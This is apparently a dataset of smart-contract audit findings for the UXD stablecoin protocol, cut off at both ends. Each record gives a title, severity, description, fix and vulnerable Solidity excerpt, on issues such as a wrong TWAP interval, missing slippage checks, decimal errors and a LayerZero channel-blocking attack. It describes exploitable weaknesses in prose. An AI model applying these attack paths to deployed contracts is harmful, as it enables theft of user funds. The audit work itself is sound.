ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. 
Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn then was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.чAllow all USDC now deposited into the insurance fund to be redeemed 1:1чUDX will become undercollateralized and the ecosystem will spiral out of controlч```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n -PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extractedчhighчPerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. 
The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearingHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.чI recommend pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can be changed at any time. 
If it is desired to make it a constant then it should at least be changed from 15 to 900.чThe mark price and by extension the position value will frequently be different from the true mark price of the market allowing for larger rebalances than should be possible.ч```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n -PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow errorчmediumчPerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error\\n```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n\\n```\\n function _withdrawAsset(uint256 amount, address to) private {\\n if (amount > netAssetDeposits) {\\n revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n }\\n netAssetDeposits -= amount;\\n\\n\\n vault.withdraw(address(assetToken), amount);\\n IERC20(assetToken).transfer(to, amount);\\n }\\n```\\n\\nThe problem here is that when user deposits X assets, then he receives Y UXD tokens. And when later he redeems his Y UXD tokens he can receive more or less than X assets. This can lead to a situation where the netAssetDeposits variable will be set to a negative value, which will revert the tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. 
As a result, 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100$. 3.User redeems his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, then the transaction will revert inside `_withdrawAsset` function with underflow error.чAs you don't use this variable anywhere else, you can remove it. Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.чUser can't redeem all his UXD tokens.ч```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n -Malicious user can use an excessively large _toAddress in OFTCore#sendFrom to break layerZero communicationчhighчBy default layerZero implements a blocking behavior, that is, that each message must be processed and succeed in the order that it was sent. In order to circumvent this behavior the receiver must implement their own try-catch pattern. If the try-catch pattern in the receiving app ever fails then it will revert to its blocking behavior. The _toAddress input to OFTCore#sendFrom is calldata of any arbitrary length. An attacker can abuse this and submit a send request with an excessively large _toAddress to break communication between networks with different gas limits.\\n```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n\\nThe _toAddress input to OFTCore#sendFrom is a bytes calldata of any arbitrary size. 
This can be used as follows to break communication between chains that have different block gas limits.\\nExample: Let's say that an attacker wishes to permanently block the channel Arbitrum -> Optimism. Arbitrum has a massive gas block limit, much higher than Optimism's 20M block gas limit. The attacker would call sendFrom on the Arbitrum chain with the Optimism chain as the destination. For the _toAddress input they would use an absolutely massive amount of bytes. This would be packed into the payload which would be called on Optimism. Since Arbitrum has a huge gas limit the transaction would send from the Arbitrum side but it would be so big that the transaction could never succeed on the Optimism side due to gas constraints. Since that nonce can never succeed the communication channel will be permanently blocked at the Optimism endpoint, bypassing the nonblocking behavior implemented in the OFT design and reverting to the default blocking behavior of layerZero.\\nUsers can still send messages and burn their tokens from Arbitrum -> Optimism but the messages can never be received. This could be done between any two chain in which one has a higher block gas limit. This would cause massive loss of funds and completely cripple the entire protocol.чLimit the length of _toAddress to some amount (i.e. 
256 bytes) as of right now EVM uses 20 bytes address and Sol/Aptos use 32 bytes address, so for right now it could be limited to 32 bytes.\\n```\\n function sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n+ require(_toAddress.length <= maxAddressLength); \\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n }\\n```\\nчMassive loss of user funds and protocol completely crippledч```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n -RageTrade senior vault USDC deposits are subject to utilization caps which can lock deposits for long periods of time leading to UXD instabilityчhighчRageTrade senior vault requires that it maintains deposits above and beyond the current amount loaned to the junior vault. Currently this is set at 90%, that is the vault must maintain at least 10% more deposits than loans. Currently the junior vault is in high demand and very little can be withdrawn from the senior vault. 
A situation like this is far from ideal because in the even that there is a strong depeg of UXD a large portion of the collateral could be locked in the vault unable to be withdrawn.\\nDnGmxSeniorVault.sol\\n```\\nfunction beforeWithdraw(\\n uint256 assets,\\n uint256,\\n address\\n) internal override {\\n /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n revert MaxUtilizationBreached();\\n\\n // take out required assets from aave lending pool\\n pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n\\nDnGmxSeniorVault.sol#beforeWithdraw is called before each withdraw and will revert if the withdraw lowers the utilization of the vault below a certain threshold. This is problematic in the event that large deposits are required to maintain the stability of UXD.чI recommend three safeguards against this:\\nMonitor the current utilization of the senior vault and limit deposits if utilization is close to locking positions\\nMaintain a portion of the USDC deposits outside the vault (i.e. 
10%) to avoid sudden potential liquidity crunches\\nCreate functions to balance the proportions of USDC in and out of the vault to withdraw USDC from the vault in the event that utilization threatens to lock collateralчUXD may become destabilized in the event that the senior vault has high utilization and the collateral is inaccessibleч```\\nfunction beforeWithdraw(\\n uint256 assets,\\n uint256,\\n address\\n) internal override {\\n /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n revert MaxUtilizationBreached();\\n\\n // take out required assets from aave lending pool\\n pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n -USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralizedчhighчPerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. 
The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n    external\\n    nonReentrant\\n    onlyOwner\\n{\\n    if (amount == 0) {\\n        revert ZeroAmount();\\n    }\\n\\n    insuranceDeposited -= amount;\\n\\n    vault.withdraw(insuranceToken(), amount);\\n    IERC20(insuranceToken()).transfer(to, amount);\\n\\n    emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn than was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.чAllow all USDC now deposited into the insurance fund to be redeemed 1:1чUXD will become undercollateralized and the ecosystem will spiral out of controlч```\\nfunction withdrawInsurance(uint256 amount, address to)\\n    external\\n    nonReentrant\\n    onlyOwner\\n{\\n    if (amount == 0) {\\n        revert ZeroAmount();\\n    }\\n\\n    insuranceDeposited -= amount;\\n\\n    vault.withdraw(insuranceToken(), amount);\\n    IERC20(insuranceToken()).transfer(to, amount);\\n\\n    emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n -PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extractedчhighчPerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. 
The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearingHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n    uint256 markPrice = getMarkPriceTwap(15);\\n    int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n        .getTakerPositionSize(address(this), market);\\n    return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n    public\\n    view\\n    returns (uint256)\\n{\\n    IExchange exchange = IExchange(clearingHouse.getExchange());\\n    uint256 markPrice = exchange\\n        .getSqrtMarkTwapX96(market, twapInterval)\\n        .formatSqrtPriceX96ToPriceX96()\\n        .formatX96ToX10_18();\\n    return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.чI recommend pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can be changed at any time. 
If it is desired to make it a constant then it should at least be changed from 15 to 900.чThe mark price and by extension the position value will frequently be different from true mark price of the market allowing for larger rebalances than should be possible.ч```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n -`rebalanceLite` should provide a slippage protectionчmediumчUsers can lose funds while rebalancing.\\nThe protocol provides two kinds of rebalancing functions - `rebalance()` and `rebalanceLite()`. While the function `rebalance()` is protected from an unintended slippage because the caller can specify `amountOutMinimum`, `rebalanceLite()` does not have this protection. 
This makes the user vulnerable to unintended slippage due to various scenarios.\\n```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n\\nEspecially, according to the communication with the PERP dev team, it is possible for the Perp's ClearingHouse to fill the position partially when the price limit is specified (sqrtPriceLimitX96). 
It is also commented in the Perp contract comments here.\\n```\\n /// @param sqrtPriceLimitX96 tx will fill until it reaches this price but WON'T REVERT\\n struct InternalOpenPositionParams {\\n address trader;\\n address baseToken;\\n bool isBaseToQuote;\\n bool isExactInput;\\n bool isClose;\\n uint256 amount;\\n uint160 sqrtPriceLimitX96;\\n }\\n```\\n\\nSo it is possible that the order is not placed to the full `amount`. As we can see in the #L626~#L628, the UXD protocol grabs the quote token of `amount` and deposits to the Perp's vault. And the unused `amount` will remain in the Perp vault while this is supposed to be returned to the user who called this rebalance function.чAdd a protection parameter to the function `rebalanceLite()` so that the user can specify the minimum out amount.чUsers can lose funds while lite rebalancing.ч```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n 
isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n -`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.чmediumч`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.\\nCurrently, `_rebalanceNegativePnlWithSwap()` uses a `sqrtPriceLimitX96` param twice for placing a perp order and swapping.\\n```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n\\nIn `_placePerpOrder()`, it uses the uniswap pool inside the perp protocol and uses a `spotSwapper` for the second swap which is for the uniswap as well.\\nBut as we can see here, Uniswap V3 introduces multiple pools for each token pair and 2 pools might be different and I think it's not good to use the same `sqrtPriceLimitX96` for different pools.\\nAlso, I think it's not mandatory to check a `sqrtPriceLimitX96` as it checks `amountOutMinimum` already. 
(It checks `amountOutMinimum` only in `_openLong()` and _openShort().)чI think we can use the `sqrtPriceLimitX96` param for one pool only and it would be enough as there is an `amountOutMinimum` condition.ч`PerpDepository._rebalanceNegativePnlWithSwap()` might revert when it should work as it uses the same `sqrtPriceLimitX96` for different pools.ч```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n -Vulnerable GovernorVotesQuorumFraction versionчmediumчThe protocol uses an OZ version of contracts that contain a known vulnerability in government contracts.\\n`UXDGovernor` contract inherits from GovernorVotesQuorumFraction:\\n```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n\\nIt was patched in version 4.7.2, but this protocol uses an older version: \"@openzeppelin/contracts\": \"^4.6.0\"чUpdate the OZ version of contracts to version >=4.7.2 or at least follow the workarounds of OZ if not possible otherwise.чThe potential impact is described in the OZ advisory. 
This issue was assigned with a severity of High from OZ, so I am sticking with it in this submission.ч```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n -Deposit and withdraw to the vault with the wrong decimals of amount in contract `PerpDepository`чmediumчFunction `vault.deposit` and `vault.withdraw` of vault in contract `PerpDepository` need to be passed with the amount in raw decimal of tokens (is different from 18 in case using USDC, WBTC, ... as base and quote tokens). But some calls miss the conversion of decimals from 18 to token's decimal, and pass wrong decimals into them.\\nFunction `vault.deposit` need to be passed the param amount in token's decimal (as same as vault.withdraw). You can see at function `_depositAsset` in contract PerpDepository.\\n```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n\\nBut there are some calls of `vault.deposit` and `vault.withdraw` that passed the amount in the wrong decimal (18 decimal). 
Let's see function `_rebalanceNegativePnlWithSwap` in contract PerpDepository:\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount); \\n \\n // rest of code\\n \\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\nBecause function `_placePerpOrder` returns in decimal 18 (confirmed with sponsor WarTech), this calls pass `baseAmount` and `quoteAmount` in decimal 18, inconsistent with the above call. It leads to vault using the wrong decimal when depositing and withdrawing tokens.\\nThere is another case that use `vault.withdraw` with the wrong decimal (same as this case) in function _rebalanceNegativePnlLite:\\n```\\n//function _rebalanceNegativePnlLite, contract PerpDepository\\n// rest of code\\n\\n(uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n);\\nvault.withdraw(assetToken, baseAmount);\\n\\n// rest of code\\n```\\nчShould convert the param `amount` from token's decimal to decimal 18 before `vault.deposit` and `vault.withdraw`.чBecause of calling `vault.deposit` and `vault.withdraw` with the wrong decimal of the param amount, the protocol can lose a lot of funds. 
And some functionalities of the protocol can be broken cause it can revert by not enough allowance when calling these functions.ч```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n -Price disparities between spot and perpetual pricing can heavily destabilize UXDчmediumчWhen minting UXD using PerpDepository.sol the amount of UXD minted corresponds to the amount of vUSD gained from selling the deposited ETH. This is problematic given that Perp Protocol is a derivative rather than a spot market, which means that price differences cannot be directly arbitraged with spot markets. The result is that derivative markets frequently trade at a price higher or lower than the spot price. The result of this is that UXD is actually pegged to vUSD rather than USD. This key difference can cause huge strain on a USD peg and likely depegging.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n\\nPerpDepository#deposit shorts the deposit amount and returns the amount of vUSD resulting from the swap, which effectively pegs it to vUSD rather than USD. When the perpetual is trading at a premium arbitrage will begin happening between the spot and perpetual asset and the profit will be taken at the expense of the UXD peg.\\nExample: Imagine markets are heavily trending with a spot price of $1500 and a perpetual price of $1530. A user can now buy 1 ETH for $1500 and deposit it to mint 1530 UXD. 
They can then swap the UXD for 1530 USDC (or other stablecoin) for a profit of $30. The user can continue to do this until either the perpetual price is arbitraged down to $1500 or the price of UXD is $0.98.чI recommend integrating with a chainlink oracle and using its price to determine the true spot price of ETH. When a user mints make sure that the amount minted is never greater than the spot price of ETH which will prevent the negative pressure on the peg:\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n\\n+ spotPrice = assetOracle.getPrice();\\n+ assetSpotValue = amount.mulwad(spotPrice);\\n\\n- return quoteAmount;\\n+ return quoteAmount <= assetSpotValue ? quoteAmount: assetSpotValue;\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\nчUXD is pegged to vUSD rather than USD which can cause instability and loss of pegч```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n -PerpDepository#_placePerpOrder miscalculates fees paid when shortingчmediumчPerpDepository#_placePerpOrder calculates the fee as a percentage of the quoteToken received. 
The issue is that this amount already has the fees taken so the fee percentage is being applied incorrectly.\\n```\\nfunction _placePerpOrder(\\n uint256 amount,\\n bool isShort,\\n bool amountIsInput,\\n uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n .OpenPositionParams({\\n baseToken: market,\\n isBaseToQuote: isShort, // true for short\\n isExactInput: amountIsInput, // we specify exact input amount\\n amount: amount, // collateral amount - fees\\n oppositeAmountBound: upperBound, // output upper bound\\n // solhint-disable-next-line not-rely-on-time\\n deadline: block.timestamp,\\n sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n referralCode: 0x0\\n });\\n\\n (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n params\\n );\\n\\n uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n totalFeesPaid += feeAmount;\\n\\n emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n internal\\n view\\n returns (uint256)\\n{\\n return amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n\\nWhen calculating fees, `PerpDepository#_placePerpOrder` use the quote amount retuned when opening the new position. It always uses exactIn which means that for shorts the amount of baseAsset being sold is specified. The result is that quote amount returned is already less the fees. If we look at how the fee is calculated we can see that it is incorrect.\\nExample: Imagine the market price of ETH is $1000 and there is a market fee of 1%. The 1 ETH is sold and the contract receives 990 USD. 
Using the math above it would calculate the fee as $99 (990 * 1%) but actually the fee is $100.\\nI have submitted this as a medium because it is not clear from the given contracts what the fee totals are used for and I cannot fully assess the implications of the fee value being incorrect.чRewrite _calculatePerpOrderFeeAmount to correctly calculate the fees paid:\\n```\\n- function _calculatePerpOrderFeeAmount(uint256 amount)\\n+ function _calculatePerpOrderFeeAmount(uint256 amount, bool isShort)\\n internal\\n view\\n returns (uint256)\\n {\\n+ if (isShort) {\\n+ return amount.divWadDown(WAD - getExchangeFeeWad()) - amount;\\n+ } else {\\n return amount.mulWadUp(getExchangeFeeWad());\\n+ }\\n }\\n```\\nчtotalFeesPaid will be inaccurate which could lead to disparities in other contracts depending on how it is usedч```\\nfunction _placePerpOrder(\\n    uint256 amount,\\n    bool isShort,\\n    bool amountIsInput,\\n    uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n    uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n    IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n        .OpenPositionParams({\\n            baseToken: market,\\n            isBaseToQuote: isShort, // true for short\\n            isExactInput: amountIsInput, // we specify exact input amount\\n            amount: amount, // collateral amount - fees\\n            oppositeAmountBound: upperBound, // output upper bound\\n            // solhint-disable-next-line not-rely-on-time\\n            deadline: block.timestamp,\\n            sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n            referralCode: 0x0\\n        });\\n\\n    (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n        params\\n    );\\n\\n    uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n    totalFeesPaid += feeAmount;\\n\\n    emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n    return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n    internal\\n    view\\n    returns (uint256)\\n{\\n    return 
